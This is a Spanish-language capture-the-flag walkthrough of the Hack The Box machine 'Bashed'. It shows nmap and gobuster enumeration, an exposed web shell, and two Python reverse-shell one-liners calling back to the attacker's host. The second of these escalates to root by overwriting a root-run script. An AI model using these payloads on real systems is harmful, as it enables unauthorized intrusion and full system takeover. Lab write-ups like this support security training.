[HTB] Bashed

Hoy vamos a hackear la maquina de HTB llamada Bashed.

Video


Enumeration


Para empezar hacemos un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 10.10.10.68
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 11:32 CEST
Nmap scan report for 10.10.10.68
Host is up (0.032s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.54 seconds
Vemos que solo tiene el puerto 80 abierto. Lo investigamos un poco mas.

sml@Cassandra:~$ gobuster dir -u http://10.10.10.68 -w 
/usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.68
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/01 11:33:33 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/css (Status: 301)
/dev (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/php (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)
===============================================================
2020/06/01 11:33:50 Finished
===============================================================

Low Shell


Encontramos el directorio /dev. Si visitamos http://10.10.10.68/dev/phpbash.php podemos ver que se ejecuta una "consola" via web. Ponemos nc a la escucha.

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
Y en la "consola" web ponemos la siguiente linea para obtener una shell.

python -c 'import 
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec
t(("10.10.14.10",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
La tenemos...

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.68] 4
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

user.txt



$ cd /home
$ ls
arrexel
scriptmanager
$ cd arrexel
$ ls
user.txt
$ cat user.txt
2c281f318555dbc1b856957c7147bfc1
Echamos un vistazo a ver que podemos hacer.

$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
Usamos sudo para obtener los privilegios del usuarios scriptmanager.

$ sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/var/www/html/dev$ id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)

Privilege Escalation


Vemos que hay una carpeta llamada /scripts, y que ejecuta un script (test.py) con privilegios de root. Vamos a modificarlo para obtener otra reverse shell, esta vez con privilegios de root. Ponemos nc a la escucha...

sml@Cassandra:~$ nc -nlvp 8888
listening on [any] 8888 ...
Y vamos a ello :)

scriptmanager@bashed:/$ cd /scripts
scriptmanager@bashed:/scripts$ ls
test.py  test.txt
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ cat test.txt
testing 123!
scriptmanager@bashed:/scripts$ ls -l
ls -l
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec  4  2017 test.py
-rw-r--r-- 1 root          root          12 May  9 15:06 test.txt
echo 'import 
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec
t(("10.10.14.10",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > test.py
Despues de esperar, la tenemos!

sml@Cassandra:~$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.68] 55334
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

root.txt



# cd /root
# ls
root.txt
# cat root.txt
cc4f0afe3a1026d402ba10329674a8e2

End


Y con esto ya tendriamos el flag del "user" y el flag de "root".